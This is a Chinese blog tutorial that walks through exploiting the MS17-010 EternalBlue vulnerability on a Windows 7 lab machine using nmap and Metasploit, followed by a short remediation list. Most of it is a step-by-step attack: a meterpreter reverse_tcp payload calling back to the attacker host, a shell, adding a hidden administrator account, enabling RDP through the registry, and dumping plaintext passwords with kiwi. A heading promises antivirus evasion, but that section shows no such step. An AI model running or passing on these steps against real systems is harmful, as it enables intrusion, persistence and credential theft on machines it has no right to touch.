MS17-010(Eternal blue永恒之蓝)漏洞利用+修复方法

目录

1.准备工作

2.漏洞扫描(二选一)

3.使用MSF(metasploit)工具

4.选择编码技术,用于绕过杀毒软件的查杀

5.远程控制

6.修复方法

7.扩充(查看Windows密码)


1.准备工作

  • 靶机:Windows 7(IP:192.168.237.129)
  • 攻击机:kali 2022(IP:192.168.237.130)
  • 工具:nmap(漏洞扫描)、metasploit(msf)

前提:两台主机需要在一个网段之下,能够相互ping通

2.漏洞扫描(二选一)

使用nmap的漏洞扫描程序

  • 扫描端口
sudo su     #切换root用户 
nmap -sS -sV 192.168.237.0/24     #扫描目标的IP段,查看上线主机

可以看到nmap扫到目标机192.168.237.129,操作系统是Windows7,同时开放了445端口,而永恒之蓝利用的就是445端口的SMB服务,操作系统溢出漏洞。

  • 扫描常见漏洞
nmap --script=vuln 192.168.237.129 #使用vuln扫描常见的漏洞

可以发现,靶机上扫到了4个漏洞,其中包括了MS17-010。

3.使用MSF(metasploit)工具

msfconsole     #进入msf工具 
search ms17-010     #搜索漏洞编号为ms17-010的相关模块
  • 查询漏洞的相关模块

其中exploit是攻击模块,auxiliary是辅助模块。

4.选择编码技术,用于绕过杀毒软件的查杀

1.使用攻击模块use(模块序号)

use 0 #选用编号为0的模块 或use auxiliary/scanner/smb/smb_ms17_010

2.payload配置攻击载荷

set payload Windows/x64/meterpreter/reverse_tcp #配置攻击载荷并且使用反向连接

3.show options查看配置选项

show options #查看配置选项

4.set rhosts配置目标IP地址

set rhosts 192.168.237.129 #配置目标IP地址

5.set lhosts配置攻击者IP地址

set lhost 192.168.237.130 #配置攻击者IP地址

6.开始攻击

run #开始攻击 exploit #开始攻击

显示WIN则代表攻击成功

5.远程控制

1.获取目标机shell

shell     #拿到目标机shell

chcp 65001解决中文乱码问题

2.添加用户

net user admin 123456 /add     #net user 用户名 密码 /add 
net user                       #查看用户是否添加成功

用户添加成功!

3.权限提升

net localgroup administrators admin /add #权限提升到管理级别

4.开启远程桌面

netstat -ano #查看端口开启状态,主要是看3389
  • 如果没有3389端口,开启3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
  • 开启远程连接

注意:此时需要再开一个命令行

rdesktop 192.168.237.129 #远程连接

可以使用remmina命令开启远程连接窗口:

6.修复方法

  • 关闭445端口
  • 安装对应补丁
  • 打开防火墙

7.扩充(查看Windows密码)

前提:已经进入meterpreter窗口

加载kiwi模块:

查看kiwi模块的使用:

creds_all:该命令可以列举系统中的明文密码(查看内存)

  • 12
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值